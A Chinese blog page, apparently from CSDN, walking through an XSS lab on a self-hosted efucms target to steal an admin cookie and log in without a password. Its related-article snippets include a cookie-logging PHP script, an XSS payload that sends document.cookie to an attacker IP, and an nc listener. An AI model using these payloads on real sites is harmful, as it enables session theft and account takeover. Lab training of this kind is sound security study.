Xss获取cookie,绕过密码

最新推荐文章于 2024-05-23 00:17:34 发布
最新推荐文章于 2024-05-23 00:17:34 发布
阅读量367 收藏 1
点赞数
CC 4.0 BY-SA版权
文章标签: xss 安全 web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/CSMin01_21/article/details/130160763
文章详细描述了如何使用阿里云盘的资源搭建efucms靶场,包括配置config.php和.htaccess文件,安装phpMyadmin,创建数据库并导入数据。接着,在火狐浏览器中测试XSS漏洞,利用XSS安全测试平台创建项目获取cookie。最后,通过efucms后台登录并使用获取的cookie实现自动登录。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

阿里云盘分享资源链接

一、搭建efucms-master靶场

1.config.php更改为数据库的账号密码

htaccess的文件内容也要改一下啦!

2.小皮XP上安装phpMyadmin

  • php的版本一定要是5.5.9

3、整一个数据库

  • 新建数据库

  • 导入efucms.sql

攻击机:

二、进入搭建的数据库测试

1、

2、XSS注入

4、登录efucms后台(提前信息收集好的后台admin)

5、XSS项目中查看获取的cookie

这样就直接登陆啦!

 

Doris_csm
关注
xss获取cookie登陆
weixin_51356351的博客
11-17 1149
实验环境: phpstudy DVWA靶场 实验步骤 1、在phpstudy的www目录下创建一个名为1.php的文件,文件内容如下: <?php $file = fopen("1.txt","a"); if($_GET['cookie']){ $cookie = $_GET['cookie']; fputs ($file,"$cookie\n"); } ?> 2、进入DVWA靶机,级别调成low,选择(XSS)stored 3、F12打开查看器,将值改的大一点 4、将插入留言板中
xss获取cookie密码登录-学习笔记
XiaoXiao_RenHe的专栏
05-06 1802
什么是cookie,什么是xss,如何通过xss获取cookie以便登录系统。
xss练习——获取cookie绕过登录名密码
haoaaao的博客
01-22 1050
1、脚本实现功能:将被攻击方cookie发送至黑客 /*****document.write:写入脚本 document.cookie获取被攻击方cooki img src:get请求返回脚本内容 ****/ <script>document.write('<img src="http://192.168.1.32:8023/?'+document.cookie+'"/>')</script> ...
XSSXSS挖掘&绕过
zh的博客
10-11 621
靶场地址:http://www.whalwl.top:8013 解题准备:本题需要绕过特殊符号的过滤 解题思路: 根据主页留言板,管理员告诉我们flag在它那里,于是给他私信,让它中招 1、首先新建两个小号,互相测试哪种代码能够成功绕过过滤 确定XSS代码后,再给管理员发私信,通过xss平台成功获取管理员cookie。 经过小号互相测试,发现私信会过滤<s以及script,采用<img报错触发代码可以绕过,顺利收集cookie <img...
XSS平台的简单搭建和获取cookie
m0_65096687的博客
10-09 2683
XSS平台可以辅助安全测试人员对XSS相关的漏洞危害进行深入学习,了解XSS的危害重视XSS的危害,如果要说XSS可以做哪些事情,XSS可以做js能够做的所有事情。包括但不限于:窃取Cookie、后台增删改文章、钓鱼、利用XSS漏洞进行传播、修改网页代码、网站重定向、获取用户信息(如浏览器信息,IP地址等)等。选择蓝莲花XSS平台的原因很简单,因为网络上大多数XSS平台都是需要注册啊,绑定什么的。2.把下载好的蓝莲花解压在PHPstudy的WWW目录下,这里为我更名为XSS。只需要修改登录密码进行提交。
反射型XSS,存储型XSS,Dom型XSS,如何获取cookie,XSS钓鱼,XSS获取键盘记录
weixin_43858799的博客
04-22 3205
XSS: 反射型XSS,存储型XSS,Dom型XSS,如何获取cookie,XSS钓鱼,XSS获取键盘记录 一、跨站脚本漏洞(XSSXSS漏洞一直被评估为web漏洞中危害较大的漏洞 XSS是一种发生在web前端的漏洞,主要危害前端用户 XSS可以通过进行钓鱼攻击,前端js挖矿,用户cookie获取,甚至结合浏览器自身漏洞对主机进行远程控制等 攻击流程图: 危害:存储型>反射型>D...
后台爆破与XSS判断:绕过验证码与cookie获取方法
挑战在于如何绕过这种验证码策略,通过技巧或工具使得验证码不再随用户的密码输入变化,从而实现“绕过”验证。 具体步骤包括:1)使用Burp Suite打开后台,随意输入用户名和密码;2)手动输入正确的验证码,然后在...
第27天-WEB 漏洞-XSS 跨站之代码及 httponly 绕过
MCTSOG的博客
03-12 1202
代码类过滤:Xsslabs HttpOnly 属性过滤防读取 绕过 httponly: 浏览器未保存帐号密码:需要 xss 产生登录地址(漏洞产生在登录界面),利用表单劫持 浏览器保存帐号密码:浏览器读取帐号密码 知识补充 参考文章: 利用HTTP-only Cookie缓解XSS之痛 什么是HttpOnly - OSCHINA - 中文开源技术交流社区 XSS与HTTP-only Cookie简介 为了缓解跨站点脚本攻击带来的信息泄露风险,Internet Explorer 6 SP1为Cookie引.
XSS & CSRF 】泄露cookie——以DVWA-High为例
最新发布
Mr_Fmnwon的博客
05-23 2129
综合利用XSS以及CSRF实现Cookie的泄露,,,旅程比较曲折跨站脚本攻击XSS(最全最细致的靶场实战)_xss靶场-优快云博客网站中包含大量的动态内容以提高用户体验,比过去要复杂得多。所谓动态内容,就是根据用户环境和需要,Web应用程序能够输出相应的内容。
使用XSS漏洞获取用户cookie免密登录实验
qq_43395215的博客
05-17 3454
使用XSS漏洞盗取cookie,并绕过密码登录 首先环境的搭建,使用DVWA平台的XSS漏洞,这个DVWA的XSS漏洞在前面都讲过,所以我们直接使用LOW等级获取cookie,并保存在Web服务器上,这里使用LOW等级是为了方便,其他等级都是一样的做法,只是构造的脚本不同 使用脚本获取cookie <script>alert(document.cookie)</script> 这是一个很简单的XSS漏洞,可以弹出用户的cookie,但是现在我们不是要将cookie弹出,而是将其保存
XSS基础及实战(XSS提取cookie并登录的)
热门推荐
qidiandexiaowu
09-06 1万+
该学新知识了! 目录XSS基础XSS分类反射型XSS的利用 XSS基础 XSS的定义:XSS攻击通常指的是通过利用网页开发时留下的漏洞,通过巧妙的方法注入恶意指令代码到网页,使用户加载并执行攻击者恶意制造的网页程序。这些恶意网页程序通常是JavaScript,但实际上也可以包括Java、 VBScript、ActiveX、 Flash 或者甚至是普通的HTML。攻击成功后,攻击者可能得到包括但不限于更高的权限(如执行一些操作)、私密网页内容、会话和cookie等各种内容。 XSS分类 XSS有三类:反射型X
xss盗取cookie原理剖析
weixin_51692662的博客
10-19 2228
xss盗取cookie
利用 XSS 获取 Cookie 利用DOM XSS
weixin_71416901的博客
06-21 1389
XSS
xss平台打cookie登录后台(保姆级教程)
orange777
02-25 4713
前言 最新看了一篇hack学习呀【记一次帮助粉丝渗透黑入杀猪盘诈骗的实战】的文章,有个xss的地方自己有点疑问就自己搭平台复现了一下 phpstudy环境复现 找一个xss平台,如 http://xsscom.com/ 随便新建一个项目111,复制下面的代码到存在xss的地方即可 直接找个反射型xss试一下(这里在虚机登录) 这里xss平台获取到用户登录情况 用这个获取到的cookie登录一下后台(在物理机试下) 这里说一下,为了方便可以下载一个修改cookie的插件,如google浏览器的EditT
XSS偷取密码Cookies通用脚本
收集盒 Book box
08-30 1149
很多人经常需要XSS得到别人Cookies或者要在网页里插入脚本或许密码。 今天写个通用脚本工具 文件如下 asp.asp或者php.php 或者cookies.htm效果如下 保存文本 发送邮件 获取cookies
利用xss漏洞获取cookie并实现远程登录实验
2302_81105681的博客
04-19 492
用beef截获到受害者的cookie替换登录数据包的cookie,使用受害者的身份完成登录。服务器:winserver 2022 (192.168.25.156)攻击机的beef页面中发现受害者上钩,获得受害者的cookie。注意:这个输入框需要按F12在前端代码中修改最长字符。访问到被注入恶意代码的页面,这时受害者还没有察觉到。攻击机登录dvwa,打开存在xss漏洞的页面。本实验用到的环境为:DVWA靶场。攻击机登录的账户为smithy。受害者登录的账户为admin。受害者:win 10。
技巧:XSS漏洞结合nc窃取Cookie实现免密码登录
weixin_51339377的博客
04-18 2647
XSS漏洞结合nc窃取Cookie实现免密码登录(已亲身通过burp抓包改Cookie在不同电脑实践成功!) 如果某天不能用外网,也不能用kali 存储型xss最重要的是获取用户的cookie!!!!!!!!!! document.cookie 获取用户所在网站的cookie 1.在黑客端用nc进行监听 nc -lvp 4444 //使用nc监听4444端口 2.XSS注入的恶意script脚本 <script>var img = docum...
XSS跨站脚本攻击之——XSS平台搭建与——Cookie获取
温柔小薛的博客
04-05 1139
XSS平台搭建及Cookie获取 准备工作 利用pikachuXSS后台 pikachu\pkxss\inc目录下的config.inc.php 修改mysql用户名密码 登录后台 pikachu\pkxss\xcookie目录解读 cookie.php 获取cookie的API页面并存到攻击者平台数据库中 获取完后才能重定向一个可信网站,起到迷惑用户隐藏攻击过程的作用 ...
xss获取cookie的方法
计算机毕业论文源码,学生个人网页制作html源码。贴近用户做网络推广和互联网优化。
12-27 2080
xss获取cookie简单步骤如下: 1、在存在漏洞的论坛中发日志。 2、然后以管理远登陆,进入后页面会跳转,此时cookie就发送到你的服务器下的code.txt文件中了。 3、这是没有账户前的登陆界面。 4、打开firefox的Tamper Data插件,点击Start Tamper开始抓取信息,刷新登陆界面,然后会跳出对话框,点击Tamper按钮,在途中的cookie一栏中替换掉你抓取到的cookie,单击确定发送请求数据,xss获取cookie 5、替换cookie后不用输用户名密码
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值